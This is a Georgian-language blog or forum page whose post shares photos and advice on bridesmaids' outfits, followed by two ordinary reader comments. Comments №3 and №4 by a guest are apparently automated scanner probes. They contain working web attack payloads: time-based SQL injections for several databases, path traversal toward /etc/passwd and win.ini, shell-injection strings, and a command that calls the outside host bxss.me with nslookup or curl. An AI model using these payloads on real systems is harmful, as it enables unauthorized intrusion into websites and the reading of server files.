შესვლა
რეგისტრაცია
რეკლამა

შენი ქორწილი : მეჯვარეები


1-08-2016, 09:17
ავტორი ანა_მარიამი
ნანახია 8 740

შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები
შენი ქორწილი : მეჯვარეები


მაგარჯობა ♥ ამჯერად დაგიბრუნდით ქორწილის ასევე ერთ-ერთი საყურადღებო ფაქტორით - მეჯვარეების (ხელისმომკიდეების) ჩაცმულობის ფოტოებით. მათ ნეფე-პატარძლის შემდეგ ყველაზე დიდი ყურადღება ექცევათ, აიტომ არ დატოვოთ ეს მხარე უყურადღებოდ და იყავით კრეატიულები, გამორჩეულები და ორიგინალურები ^_^
პ.ს მინდოდა დამედო მოსაწვევი ბარათები, მაგრამ ფოტოს ზომები არ შეესაბამება საიტის სტანდარტებს. ასერომ....



№1  offline წევრი BleckHeartMIA

მომწონს როდესაც მეფეს და დედოფალს რამდენიმე მეჯვარე ყავს და ზუსტად მსგავს ტანისამოსში რომ არიან გამოწყობილი უფრო ალამაზებს ქპრწილსჩემი აზრით

 


№2  offline წევრი amalia

BleckHeartMIA
მომწონს როდესაც მეფეს და დედოფალს რამდენიმე მეჯვარე ყავს და ზუსტად მსგავს ტანისამოსში რომ არიან გამოწყობილი უფრო ალამაზებს ქპრწილსჩემი აზრით

გეთანხმებით

 


№3 სტუმარი pHqghUme

(nslookup -q=cname hithezbbnttnse29e3.bxss.me||curl hithezbbnttnse29e3.bxss.me))

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

'.gethostbyname(lc('hitqb'.'sbwcvrzyfe217.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(72).chr(108).chr(65).'

'+'A'.concat(70-3).concat(22*4).concat(99).concat(88).concat(98).concat(87)+(require'socket'
Socket.gethostbyname('hitvr'+'nhektfqm59898.bxss.me.')[3].to_s)+'

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555-1; waitfor delay '0:0:15' --

555-1); waitfor delay '0:0:15' --

555-1 waitfor delay '0:0:15' --

555EYyClu9s'; waitfor delay '0:0:15' --

555-1 OR 990=(SELECT 990 FROM PG_SLEEP(15))--

555-1) OR 318=(SELECT 318 FROM PG_SLEEP(15))--

555aooBHOug')) OR 54=(SELECT 54 FROM PG_SLEEP(15))--

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

 


№4 სტუმარი pHqghUme

16FLYiligO

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'????

echo ywfyxj$()\ oyubqx\nz^xyu||a #' &echo ywfyxj$()\ oyubqx\nz^xyu||a #|" &echo ywfyxj$()\ oyubqx\nz^xyu||a #

1'&&sleep(27*1000)*zesooe&&'

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1*if(now()=sysdate(),sleep(15),0)

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1-1; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1lhZxBuRt'; waitfor delay '0:0:15' --

1-1 OR 404=(SELECT 404 FROM PG_SLEEP(15))--

1-1) OR 305=(SELECT 305 FROM PG_SLEEP(15))--

1KWitk9LH' OR 831=(SELECT 831 FROM PG_SLEEP(15))--

1bmqMuqbq') OR 324=(SELECT 324 FROM PG_SLEEP(15))--

1nUeY7ecA')) OR 932=(SELECT 932 FROM PG_SLEEP(15))--

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

 



სახელი: *
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent